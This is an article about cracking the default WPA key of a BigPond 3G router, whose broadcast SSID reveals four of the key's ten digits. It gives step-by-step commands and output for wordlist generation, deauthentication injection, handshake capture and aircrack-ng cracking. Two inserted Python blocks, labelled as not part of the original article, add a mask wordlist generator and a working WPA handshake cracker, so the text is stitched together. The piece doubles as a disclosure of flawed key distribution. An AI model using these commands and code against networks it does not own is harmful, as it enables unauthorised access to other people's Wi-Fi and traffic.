A Little Fish in a BigPond

by kawarimono@bigpond.com

After some of the heaviest rainfall in my area in 30 years, I found myself with a flooded basement and most of my personal belongings and computer equipment destroyed.

I had to find myself a new place to live and a way to connect to the Internet.  I had been connected via an ADSL2+ connection but needed another form of connection while I found a new place to live.  A quick visit to the website of my telco, BigPond, showed a new type of connection available via high-speed wireless 3G.  I mulled over the decision of either a USB 3G card or a 3G router.  The router seemed the best way to go.  I canceled my fixed line and ADSL2+ service and ordered myself a 3G router, allowing me the flexibility of being able to move to a new place at short notice without the hassle of setting up a new account for a fixed line and ADSL service.

A few days later a courier arrived with the router.

After unpacking, I found it was a Netcomm 3G9W rebadged for BigPond.  The router had an 802.11b/g connection and a four-port switch.  Also included in the package was a credit card-sized plastic card with the details for a pre-configured SSID and WPA key for the router's 802.11 WiFi connection.  My first impression was how thoughtful the telco was to pre-configure the router for a Wi-Fi connection for the less technical-minded of their customers, with WPA TKIP PSK offering them at least some form of security and ease of setup.

The only computers I had left after the flood were an Intel 945GCLF Mini-ITX with an Intel Atom processor and my laptop.  I set the 945GCLF up with a Cat 5 connection to the router's four-port switch and, after entering my username and password for the 3G connection in the web interface of the router, I was connected to the Internet.  I also came across a ZyDAS ZD1211 USB Wi-Fi card in a box of parts that was not damaged in the flooding and decided to try out the 802.11 functionality of the router.

Looking at the card the telco had provided, something caught my eye:

   SSID: BigPond8686
WPA Key: 0903428686

The last four digits of the SSID and WPA key matched!

This had to be more than a coincidence and definitely required some further investigation.

I had played around with cracking WEP keys using a BackTrack live CD and wondered how easy it would be to crack a WPA key if I knew the last four digits in the key.

A quick search on Google turned up several sites detailing how to use Aircrack-ng to crack a WPA key.  The attack is offline: you capture the initial four-way authentication handshake, then feed Aircrack-ng a wordlist of candidate keys to test against it.

I knew what the last four digits would be, so I only needed to generate a list of every combination of a six-digit string, for the first half of the key.  Being the lazy type, and not being a fan of reinventing the wheel, I headed back to Google and searched for a wordlist generating script.

I found one written in Perl called wg.pl.

This script is no longer maintained and has now been ported to Ruby by the author.  Not being familiar with Ruby I searched for the original Perl script and found it here: digilander.libero.it/reda/downloads/perl/wg.pl

I have been using Windows 7 RC1 as my primary OS since release, so I downloaded the latest ActiveState Perl distribution and installed it.  I then generated every combination of a six-digit string and sent the output to the BackTrack 4 directory I had on my Windows drive:

C:\> perl C:\Perl\wg.pl -l 6 -u 6 -v 0123456789 > C:\BT4\wordlist.txt

This gave me a text file with a list of every possible 6-digit combination from 000000 to 999999.  I now needed to append the known four digits 8686 to the end of each line in this file.

I knocked up a quick VBScript to perform this, after first creating a blank file WPAKey.txt in the BackTrack 4 directory:

Const ForReading = 1
Const ForWriting = 2

' Append the known last four digits of the key to every six-digit line.
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objInFile = objFSO.OpenTextFile("C:\BT4\wordlist.txt", ForReading)
Set objOutFile = objFSO.OpenTextFile("C:\BT4\WPAKey.txt", ForWriting)

Do Until objInFile.AtEndOfStream
    strLine = objInFile.ReadLine
    strContents = strLine & "8686"
    objOutFile.WriteLine strContents
Loop

objInFile.Close
objOutFile.Close

I now had a wordlist I could pass to Aircrack-ng for cracking the WPA key.
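The same wordlist, and the arithmetic behind it, as an added Python example (not the author's Perl and VBScript, and not part of the original article).  A "?" in the mask marks an unknown digit and every other character is fixed, so "??????8686" reproduces the 000000 to 999999 plus 8686 list built above, and a mask with fixed digits in any other position covers a key where a different part has leaked.  The rate constant is the 262.66 k/s figure from the aircrack-ng run further down (aircrack-ng's "k/s" is keys per second); the output path is an assumption.

```python
import itertools
from typing import Iterator

DIGITS = "0123456789"

# Rate aircrack-ng reported on the Atom in the article; "k/s" there means keys per second.
ATOM_KEYS_PER_SECOND = 262.66


def expand_mask(mask: str, charset: str = DIGITS) -> Iterator[str]:
    """Yield every candidate matching `mask`: '?' is an unknown position drawn from
    `charset`, any other character is fixed.  Order is lexicographic in the unknown
    positions, so '??????8686' yields 0000008686, 0000018686, ..., 9999998686."""
    unknown = [i for i, ch in enumerate(mask) if ch == "?"]
    template = list(mask)
    for combo in itertools.product(charset, repeat=len(unknown)):
        for pos, ch in zip(unknown, combo):
            template[pos] = ch
        yield "".join(template)


def keyspace(mask: str, charset: str = DIGITS) -> int:
    """Number of candidates the mask expands to."""
    return len(charset) ** mask.count("?")


def seconds_to_exhaust(mask: str, keys_per_second: float = ATOM_KEYS_PER_SECOND,
                       charset: str = DIGITS) -> float:
    """Worst-case time to try every candidate at the given cracking rate."""
    return keyspace(mask, charset) / keys_per_second


def rank(candidate: str, mask: str, charset: str = DIGITS) -> int:
    """0-based position of `candidate` in expand_mask(mask), without enumerating:
    the unknown positions read as a big-endian base-len(charset) number.
    Lets you check aircrack-ng's '90344 keys tested' against where 0903428686
    sits in the list."""
    if len(candidate) != len(mask):
        raise ValueError("candidate and mask differ in length")
    idx = 0
    for c, m in zip(candidate, mask):
        if m == "?":
            idx = idx * len(charset) + charset.index(c)
        elif c != m:
            raise ValueError("candidate does not match the fixed part of the mask")
    return idx


def write_wordlist(mask: str, path: str, charset: str = DIGITS) -> int:
    """Write one candidate per line (what aircrack-ng -w expects); returns the line count."""
    n = 0
    with open(path, "w", encoding="ascii", newline="\n") as fh:
        for cand in expand_mask(mask, charset):
            fh.write(cand + "\n")
            n += 1
    return n


if __name__ == "__main__":
    mask = "??????8686"
    print(f"{mask}: {keyspace(mask):,} candidates, "
          f"{seconds_to_exhaust(mask) / 60:.0f} min to exhaust at {ATOM_KEYS_PER_SECOND} keys/s")
    print(f"0903428686 is candidate #{rank('0903428686', mask)}")
    full = "?" * 10
    print(f"{full}: {keyspace(full):,} candidates, "
          f"{seconds_to_exhaust(full) / 86400:.0f} days without the SSID leak")
    print(f"wrote {write_wordlist(mask, 'WPAKey.txt')} lines")  # path is an assumption
```

At the Atom's rate the leaked-digits list takes about an hour to exhaust, and 0903428686 is candidate number 90342, which is why aircrack-ng stopped after 90,344 keys; the full ten-digit numeric space would take over 400 days on the same machine.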

I set up my laptop to connect to the access point on the router, connected the ZyDAS Wi-Fi card to my Windows 7 workstation, and rebooted into the BackTrack 4 live CD.  Once BackTrack had successfully booted, I ran airmon-ng to set the Wi-Fi card into monitor mode:

# airmon-ng start wlan0
wlan0           ZyDAS 1211      zd1211rw - [phy0]
(monitor mode enabled on mon0)

I also tested that the packet capture was functioning by running Airodump-ng (airmon-ng had reported the monitor interface as mon0; on mac80211 drivers such as zd1211rw that is the interface to capture and inject on, so substitute it for wlan0 in the commands below if your card behaves the same way):

# airodump-ng wlan0

CH  3 ][ Elapsed: 3 mins ][ 2009-06-04 17:39 ]

 BSSID              PWR   Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:1A:2B:3E:5C:7B   78       254       120   2  11  54   WPA   TKIP  PSK  BigPond8686

 BSSID              STATION            PWR   Rate   Lost  Packets  Probes

 00:1A:2B:3E:5C:7B  00:1E:2A:F1:4E:D2   30   18-18     0       99

I then needed to start capturing packets between my laptop and the router, using Airodump-ng, to capture the WPA authentication handshake.

I opened another terminal window and forced the laptop to re-authenticate by injecting de-authentication packets:

# aireplay-ng -0 5 -a 00:1A:2B:3E:5C:7B -c 00:1E:2A:F1:4E:D2 wlan0
17:46:55 Waiting for beacon frame (BSSID: 00:1A:2B:3E:5C:7B) on channel 11
17:46:56 Sending 64 directed DeAuth. STMAC: [00:1E:2A:F1:4E:D2] [42|190 ACKs]
17:46:57 Sending 64 directed DeAuth. STMAC: [00:1E:2A:F1:4E:D2] [44|214 ACKs]
17:46:58 Sending 64 directed DeAuth. STMAC: [00:1E:2A:F1:4E:D2] [52|207 ACKs]
17:46:59 Sending 64 directed DeAuth. STMAC: [00:1E:2A:F1:4E:D2] [41|195 ACKs]
17:47:00 Sending 64 directed DeAuth. STMAC: [00:1E:2A:F1:4E:D2] [50|214 ACKs]

At the same time, in another terminal window, I ran Airodump-ng to capture the WPA handshake and output it to a capture file for cracking with Aircrack-ng:

# airodump-ng -c 11 --bssid 00:1A:2B:3E:5C:7B -w psk wlan0

CH 11 ][ Elapsed:  5 mins ][ 2009-06-04 17:48 ][ WPA handshake: 00:1A:2B:3E:5C:7B

 BSSID              PWR   RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:1A:2B:3E:5C:7B   78   100     3220     3084    7  11  54   WPA   TKIP  PSK  BigPond8686

 BSSID              STATION            PWR   Rate   Lost  Packets  Probe

 00:1A:2B:3E:5C:7B  00:1E:2A:F1:4E:D2   30   18- 9     0     3278 

^C
dumping to kismet csv file

After capturing the WPA handshake, I set out to crack the key using Aircrack-ng and the wordlist I had previously generated:

# aircrack-ng -w /mnt/sda2/BT4/WPAKey.txt -b 00:1A:2B:3E:5C:7B psk*.cap

                           Aircrack-ng 1.0 rc2 r1385
                   [00:05:48] 90344 keys tested (262.66 k/s)
                           KEY FOUND! [ 0903428686 ]
           Master Key : 5B E2 4B BC F0 0E CC 17 BE 76 30 19 CF D0 6D F2
                        AE 9D 25 D5 55 99 C2 30 D9 5B 5E 54 04 D3 07 55
        Transient Key : CF 11 D9 4A 36 52 4E DC AA B3 F5 C4 8F 64 74 B3
                        CC FC 64 44 7D 8E EA 42 D2 2C 91 C1 60 6C AC 39
                        31 18 47 31 43 96 54 37 EA 64 9E 26 2F BA B0 92
                        72 22 C8 EA E4 D4 4D E6 B1 6C 20 3F 3C F6 9A A9
           EAPOL HMAC : 6C E2 A9 DE 49 5B 41 88 8B 02 E1 40 F1 50 5D EA

I had expected this to take some time, especially considering the Intel Atom is not the most powerful of processors, but it was able to crack the key in less than 6 minutes.
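What Aircrack-ng is doing for each of those 90,344 lines, as an added Python example (it is not aircrack-ng's code and not from the article): derive the PMK from the candidate and the SSID with PBKDF2-HMAC-SHA1, expand it to the PTK with the two MAC addresses and two nonces from the handshake, and check the MIC on EAPOL-Key message 2 (HMAC-MD5 for WPA/TKIP as on this router; WPA2/CCMP switches to HMAC-SHA1).  There is no capture file to read here, so the handshake is constructed: the BSSID and station MAC are the ones from the airodump-ng output above, the nonces are arbitrary, and simulate_capture() computes the MIC a station holding the real key would have sent.

```python
import hashlib
import hmac
import struct
from typing import Iterable, Optional

# Constructed stand-in for the handshake in psk-01.cap: the MACs are the ones airodump-ng
# printed in the article, the nonces are arbitrary, and the frame is built below rather
# than taken from a real capture.
SSID = "BigPond8686"
AP_MAC = bytes.fromhex("001A2B3E5C7B")
STA_MAC = bytes.fromhex("001E2AF14ED2")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """802.11i PSK derivation: PBKDF2-HMAC-SHA1, 4096 rounds, 256 bits.  This is the
    'Master Key' aircrack-ng prints, and the cost that limits it to ~260 keys/s here."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: HMAC-SHA1 over label || 0x00 || data || counter, 4 blocks."""
    out = b""
    for i in range(4):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(MACs)||max(MACs)||min(nonces)||max(nonces)).
    The first 16 bytes are the KCK, the only part needed to verify a handshake MIC."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_key_mic(kck: bytes, frame_mic_zeroed: bytes, tkip: bool = True) -> bytes:
    """Key MIC over the whole EAPOL-Key frame with its MIC field zeroed:
    HMAC-MD5 for WPA/TKIP (descriptor version 1), HMAC-SHA1 truncated to 16 for CCMP."""
    digestmod = hashlib.md5 if tkip else hashlib.sha1
    return hmac.new(kck, frame_mic_zeroed, digestmod).digest()[:16]


def build_msg2(snonce: bytes, tkip: bool = True) -> bytes:
    """EAPOL-Key message 2 (station -> AP) with empty key data and the MIC field zeroed.
    Layout: EAPOL header (version, type=3, length) | descriptor type | key info | key length |
    replay counter | nonce | key IV | key RSC | key ID | MIC | key data length."""
    descriptor = 0xFE if tkip else 0x02      # WPA vendor descriptor vs RSN descriptor
    key_info = 0x0109 if tkip else 0x010A    # version 1 or 2, Pairwise and MIC bits set
    body = (struct.pack("!BHHQ", descriptor, key_info, 32 if tkip else 16, 1)
            + snonce + bytes(16) + bytes(8) + bytes(8) + bytes(16) + struct.pack("!H", 0))
    return struct.pack("!BBH", 1, 3, len(body)) + body


def simulate_capture(passphrase: str, ssid: str = SSID, tkip: bool = True):
    """Constructed handshake: the message-2 frame and MIC a station holding `passphrase`
    would send, returned as (frame_with_mic_zeroed, mic), i.e. what a cracker extracts."""
    frame = build_msg2(SNONCE, tkip)
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return frame, eapol_key_mic(kck, frame, tkip)


def crack(candidates: Iterable[str], ssid: str, ap_mac: bytes, sta_mac: bytes,
          anonce: bytes, snonce: bytes, frame_mic_zeroed: bytes, captured_mic: bytes,
          tkip: bool = True) -> Optional[str]:
    """The per-wordlist-line work of aircrack-ng -w: PMK, KCK, MIC, compare."""
    for cand in candidates:
        kck = derive_ptk(pmk_from_passphrase(cand, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_key_mic(kck, frame_mic_zeroed, tkip), captured_mic):
            return cand
    return None


if __name__ == "__main__":
    frame, mic = simulate_capture("0903428686")
    wordlist = (f"{i:06d}8686" for i in range(90_300, 90_400))  # a slice of the list above
    found = crack(wordlist, SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, frame, mic)
    print("KEY FOUND!", found)
    print("Master Key :", pmk_from_passphrase(found, SSID).hex())
```

The "Master Key" line in the aircrack-ng output is exactly this PBKDF2 output for 0903428686 and BigPond8686; the SSID being part of the salt is also why a wordlist cannot be precomputed once and reused against every BigPond router.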

This shows that the strength of the cipher is irrelevant if the method of generating and distributing the keys is flawed.  A ten-digit all-numeric key gives only 10^10 possibilities to begin with; printing four of those digits in the broadcast SSID leaves 10^6, which the wordlist above exhausts in about an hour at the 262 keys per second shown, and the key fell in under six minutes because 090342 sits about nine percent of the way into the list (hence the 90,344 keys tested).

I rang a friend I knew who also had a BigPond-supplied router, from another manufacturer, 2Wire, to see if he had a similar card with his router's SSID and WPA key.  He had also been supplied with a card, but the last four digits of the SSID did not correspond to the last four digits of the WPA key.

For his router, they had used the first four digits of the device's serial number as the last four digits of the WPA key.  At least, for him, the digits weren't broadcast for all to see, as was the case with the SSID on my router, but the key was still not randomly generated.

Details of Router: www.netcomm.com.au/products/3g/3g9wb

Manual for Router: netcomm.com.au/__data/assets/file/0009/52299/3G9W_User_Guide.pdf

BackTrack 4 Beta: www.remote-exploit.org/backtrack_download.html

Perl Word Generator Script: digilander.libero.it/reda/downloads/perl/wg.pl

Aircrack-ng against WPA: sites.google.com/site/clickdeathsquad/Home/cds-wpacrack

Code: append.vbs
